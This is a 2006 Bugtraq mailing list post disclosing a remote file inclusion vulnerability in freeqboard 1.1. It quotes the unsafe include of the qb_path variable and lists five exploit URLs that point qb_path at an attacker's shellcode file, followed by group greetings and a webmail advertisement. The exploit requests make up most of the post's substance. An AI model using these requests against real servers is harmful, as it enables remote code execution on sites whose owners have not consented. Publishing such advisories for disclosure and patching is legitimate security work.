Bugtraq mailing list archives
freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability
From: "-= SHELL =- -= SHELL =-" <she1l () hotmail com>
Date: Fri, 01 Dec 2006 11:32:26 +0300
################################################### # # freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability # # # # Author: Mr.3FReeT # # # # Softname: freeqboard # # #
################################################## # # code in : # about.php , contact.php , delete.php , faq.php , index.php # # include "config.php"; # include $qb_path."incs/mysql.php"; # ################################################## # # Exploit : # """""""" # # www.site.com/[path]/index.php?qb_path=shellcode.txt? # # www.site.com/[path]/faq.php?qb_path=shellcode.txt? # # www.site.com/[path]/delete.php?qb_path=shellcode.txt? # # www.site.com/[path]/contact.php?qb_path=shellcode.txt? # # www.site.com/[path]/about.php?qb_path=shellcode.txt? # ################################################## ## GreeTz: [ Dr.2 ] , [ ToOoFa ] , [ General C ] , [ asbmay ] , [ q8i^rock ] , [ SHiKaA ] & KuW SeC TeaM
# ################################################## _________________________________________________________________Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Current thread:
- freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability -= SHELL =- -= SHELL =- (Dec 01)